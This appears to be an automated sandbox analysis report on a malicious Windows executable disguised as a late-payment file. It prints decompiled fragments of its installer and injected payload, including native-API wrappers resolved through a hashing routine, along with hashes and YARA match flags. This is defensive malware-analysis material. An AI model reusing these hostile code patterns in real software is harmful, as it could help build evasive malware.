                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00403556() {
                                            				void* _t2;
                                            				void* _t3;
                                            				void* _t6;
                                            				void* _t8;
                                            
                                            				_t8 =  *0x41f4f4;
                                            				_t3 = E0040353B(_t2, 0);
                                            				if(_t8 != 0) {
                                            					do {
                                            						_t6 = _t8;
                                            						_t8 =  *_t8;
                                            						FreeLibrary( *(_t6 + 8));
                                            						_t3 = GlobalFree(_t6);
                                            					} while (_t8 != 0);
                                            				}
                                            				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
                                            				return _t3;
                                            			}








                                            APIs
                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                            • GlobalFree.KERNEL32 ref: 00403577
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 1100898210-823278215
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004056D2(char* _a4) {
                                            				char* _t3;
                                            				char* _t5;
                                            
                                            				_t5 = _a4;
                                            				_t3 =  &(_t5[lstrlenA(_t5)]);
                                            				while( *_t3 != 0x5c) {
                                            					_t3 = CharPrevA(_t5, _t3);
                                            					if(_t3 > _t5) {
                                            						continue;
                                            					}
                                            					break;
                                            				}
                                            				 *_t3 =  *_t3 & 0x00000000;
                                            				return  &(_t3[1]);
                                            			}






                                            APIs
                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\pago atrasado.exe,C:\Users\user\Desktop\pago atrasado.exe,80000000,00000003), ref: 004056D8
                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\pago atrasado.exe,C:\Users\user\Desktop\pago atrasado.exe,80000000,00000003), ref: 004056E6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-1246513382
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004057E4(CHAR* _a4, CHAR* _a8) {
                                            				int _t10;
                                            				int _t15;
                                            				CHAR* _t16;
                                            
                                            				_t15 = lstrlenA(_a8);
                                            				_t16 = _a4;
                                            				while(lstrlenA(_t16) >= _t15) {
                                            					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                            					_t10 = lstrcmpiA(_t16, _a8);
                                            					if(_t10 == 0) {
                                            						return _t16;
                                            					}
                                            					_t16 = CharNextA(_t16);
                                            				}
                                            				return 0;
                                            			}







                                            APIs
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                                            • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405812
                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                            • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                            • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                            • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Executed Functions

                                            APIs
                                            • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: !:A$b=A$b=A
                                            • API String ID: 2738559852-704622139
                                            • Opcode ID: 2edeae232ff652c8cb3864f0775789f917dcf87ab9fdd337eef6cabbdfcd0d56
                                            • Instruction ID: f0a7616db5dc8ab2843e66a576d22df772172ddbf993b150abda27aed2f380a7
                                            • Opcode Fuzzy Hash: 2edeae232ff652c8cb3864f0775789f917dcf87ab9fdd337eef6cabbdfcd0d56
                                            • Instruction Fuzzy Hash: C4F0F9B2200108ABCB14CF89CC84EEB77A9EF8C754F158249FA4D97241CA30E855CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 37%
                                            			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                            				void* _t18;
                                            				void* _t27;
                                            				intOrPtr* _t28;
                                            
                                            				_t13 = _a4;
                                            				_t28 = _a4 + 0xc48;
                                            				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                            				_t4 =  &_a40; // 0x413a21
                                            				_t6 =  &_a32; // 0x413d62
                                            				_t12 =  &_a8; // 0x413d62
                                            				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                            				return _t18;
                                            			}






                                            APIs
                                            • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: !:A$b=A$b=A
                                            • API String ID: 2738559852-704622139
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                            • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
                                            • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                            • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 41858fedc908b5a1f91db60ab38041ae9a9e476a531c8cec1085a650bcff829e
                                            • Instruction ID: e492d2eee3d474dd9e059b639aa8bb66731e046779164f58cf6d8ecf31579c31
                                            • Opcode Fuzzy Hash: 41858fedc908b5a1f91db60ab38041ae9a9e476a531c8cec1085a650bcff829e
                                            • Instruction Fuzzy Hash: 4601B6B2210208BBDB08CF89DC95EEB77EDAF8C754F158248FA0D97241D630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 0d193cf8b217e625361985bacf9208ab4e22c3a12280cd643bcd6388af92c4ca
                                            • Instruction ID: 1c0d342d4cf3058bb54a173b67a943a2e9698893856a94e0bab3fdaf19cfce77
                                            • Opcode Fuzzy Hash: 0d193cf8b217e625361985bacf9208ab4e22c3a12280cd643bcd6388af92c4ca
                                            • Instruction Fuzzy Hash: 85E0C2722002107BD714DBA4CC88FD77F68EF84360F0545A9F98DAB282C530E510C7D0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 84136e98b8c539dcdc7bc1152f04e11a8c236a8929089585bdc33f02b7a8284b
                                            • Instruction ID: f09df2499df8cd06342f466bad1ea290f80e2b0de04fcdece786d66633cd5a27
                                            • Opcode Fuzzy Hash: 84136e98b8c539dcdc7bc1152f04e11a8c236a8929089585bdc33f02b7a8284b
                                            • Instruction Fuzzy Hash: FC90026160101502D20171694404656040A97D0381F91C432A1014555ECA6589D2F1B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                            • Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
                                            • Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                            • Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 34%
                                            			E004188D4(void* __eax, void* __ecx, void* __edx, void* __eflags, void* _a4, long _a8, void* _a12) {
                                            				char _v0;
                                            				void* __esi;
                                            				void* __ebp;
                                            				void* _t10;
                                            
                                            				_push(ss);
                                            				if(__eflags < 0) {
                                            					_push(__eax);
                                            					_t10 = RtlAllocateHeap(__ecx); // executed
                                            					return _t10;
                                            				} else {
                                            					__eflags = __eax & 0x7bf3ee02;
                                            					__ch = __ch + __dh;
                                            					asm("repe jnp 0x4f");
                                            					__ch = __ch | __ah;
                                            					asm("in al, 0x55");
                                            					__ebp = __esp;
                                            					__eax = _v0;
                                            					__ecx =  *((intOrPtr*)(__eax + 0x10));
                                            					_t5 = __eax + 0xc74; // 0xc74
                                            					__esi = _t5;
                                            					__eax = _a8;
                                            					__ecx = _a4;
                                            					__eax = RtlFreeHeap(_a4, _a8, _a12); // executed
                                            					__esi = __esi;
                                            					__ebp = __ebp;
                                            					return __eax;
                                            				}
                                            			}








                                            APIs
                                            • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                            • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFree
                                            • String ID: &5A
                                            • API String ID: 2488874121-1617645808
                                            • Opcode ID: fcbf945e6328ea6c1887eb20fc2a2a2567de23908ff0df483301d651e10bb6be
                                            • Instruction ID: 6282274ab587063e124e8f6f94d4621d7c1d3b2a4779aafc1cb1d89d7c11a588
                                            • Opcode Fuzzy Hash: fcbf945e6328ea6c1887eb20fc2a2a2567de23908ff0df483301d651e10bb6be
                                            • Instruction Fuzzy Hash: FBF08CB52002086BD714EFA9EC89EE777ADEF88390F218559FD085B201C631E8408AF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 40%
                                            			E004188A0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16) {
                                            				intOrPtr _t9;
                                            				void* _t10;
                                            				void* _t12;
                                            				void* _t15;
                                            
                                            				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                            				_t9 = _a12;
                                            				_t6 =  &_a8; // 0x413526
                                            				_t12 =  *_t6;
                                            				_push(_a16);
                                            				_push(_t9);
                                            				_t10 = RtlAllocateHeap(_t12); // executed
                                            				return _t10;
                                            			}








                                            APIs
                                            • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: &5A
                                            • API String ID: 1279760036-1617645808
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 64%
                                            			E0041894D(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                            				char _t11;
                                            				void* _t20;
                                            
                                            				asm("repe jnp 0x4f");
                                            				asm("in al, 0x55");
                                            				_t8 = _a4;
                                            				_t3 = _t8 + 0xc74; // 0xc74
                                            				E004191D0(_t20, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                            				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                            				return _t11;
                                            			}






                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitFreeHeapProcess
                                            • String ID:
                                            • API String ID: 1180424539-0
                                            • Opcode ID: 638e98ca48876dcc6a2d4b4a75ca26f72c87f61d2700b5f618fbd2a0a80bd2e4
                                            • Instruction ID: ac497d262b34783e26b3ca760390965de9d836cbddb32587618383f770ce6fb2
                                            • Opcode Fuzzy Hash: 638e98ca48876dcc6a2d4b4a75ca26f72c87f61d2700b5f618fbd2a0a80bd2e4
                                            • Instruction Fuzzy Hash: 2EF0AFB12042047FD714DF64CC49FE73BA89F48350F144949FD595B242C531E911CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 82%
                                            			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
                                            				char _v67;
                                            				char _v68;
                                            				void* _t12;
                                            				intOrPtr* _t13;
                                            				int _t14;
                                            				long _t21;
                                            				intOrPtr* _t25;
                                            				void* _t26;
                                            				void* _t30;
                                            
                                            				_t30 = __eflags;
                                            				_v68 = 0;
                                            				E0041A130( &_v67, 0, 0x3f);
                                            				L0041AD10( &_v68, 3);
                                            				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
                                            				_t13 = L00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                            				_t25 = _t13;
                                            				if(_t25 != 0) {
                                            					_t21 = _a8;
                                            					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                            					_t32 = _t14;
                                            					if(_t14 == 0) {
                                            						_t14 =  *_t25(_t21, 0x8003, _t26 + (L00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                            					}
                                            					return _t14;
                                            				}
                                            				return _t13;
                                            			}













                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                            • Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
                                            • Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                            • Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: ae089018b483cc5af5b97608564573cf562c8fbf42ff24fac65e517310ac558a
                                            • Instruction ID: 19d6fb42efd6647f46ad17cc43e22d3cbf2539516a199e1ba29fc6e9581c60b3
                                            • Opcode Fuzzy Hash: ae089018b483cc5af5b97608564573cf562c8fbf42ff24fac65e517310ac558a
                                            • Instruction Fuzzy Hash: 2FF0F672B8021936E62165556C03FFE73589B40B51F1900BFFF04FB2C2FAA9AD4642E6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                            				int _t10;
                                            				void* _t15;
                                            
                                            				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                            				return _t10;
                                            			}






                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                            				char _t10;
                                            				void* _t15;
                                            
                                            				_t3 = _a4 + 0xc74; // 0xc74
                                            				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                            				return _t10;
                                            			}






                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 50%
                                            			E00418912() {
                                            				int _v0;
                                            				intOrPtr _v4;
                                            				void* _t13;
                                            
                                            				asm("pushad");
                                            				_push(ss);
                                            				_t6 = _v4;
                                            				E004191D0(_t13, _v4, _v4 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
                                            				ExitProcess(_v0);
                                            			}







                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: 22990e755b6d3975cbc62fea768f659959c1af4a0dcbfb079f9ec8e994eb6656
                                            • Instruction ID: c07516c4409d34d008ef245c5732bf97bb28f4cd06172ad6fb42449ff2e4143d
                                            • Opcode Fuzzy Hash: 22990e755b6d3975cbc62fea768f659959c1af4a0dcbfb079f9ec8e994eb6656
                                            • Instruction Fuzzy Hash: CFE04FB4610305BFD734DF64CC9AFD33BA99B096A0F048698B95927292D670EB50C7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00418920(intOrPtr _a4, int _a8) {
                                            				void* _t10;
                                            
                                            				_t5 = _a4;
                                            				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                            				ExitProcess(_a8);
                                            			}





                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
